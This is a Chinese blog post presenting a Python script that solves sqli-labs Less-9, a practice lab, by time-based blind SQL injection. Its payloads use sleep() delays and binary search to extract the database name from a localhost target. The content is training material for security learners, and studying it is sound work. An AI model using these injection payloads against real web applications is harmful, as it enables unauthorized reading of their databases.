sqli-labs 第九关 基于时间盲注 python 脚本

# @Author:Mirror
import time

import requests
db_len = 0
def  get_schema_len (url):
    len = 0
    left = 0
    right = 20
    while (left <= right):
        mid = left + (right - left)//2;
        data = "id=1' and if(length(database())>{},sleep(0.4),1)--+".format(mid)
        one = time.time()
        res = requests.get(url,data)
       # print (res.url)
        two = time.time()
        if abs(two - one) >= (0.4):
            left = mid + 1
        else:
            right = mid - 1
    len = left
    print (len)
    return len


def get_schema_name(url):
    len = get_schema_len(url)
    db_name = ''
    for i in range(1,len+1):
        left = 0
        right = 128
        while(left <= right):
            mid = left + (right - left)//2
            data = "id=1' and if (substr(database(),{},1)>'{}',sleep(0.4),1)--+".format(i,chr(mid))
            one = time.time()
            res = requests.get(url,data)
            print (res.url)
            two = time.time()
            if abs(two - one) >=0.4:
                left = mid + 1
            else :
                right = mid - 1
        db_name+=chr(left)
    print (db_name)



url = "http://localhost:800/sqli-labs/Less-9/"
get_schema_name(url)


以上是一部分,要学会自己编写脚本喔!库名好像都是大写

上一篇:CTFShow 命令执行


下一篇:upload-labs,Web:Pass-01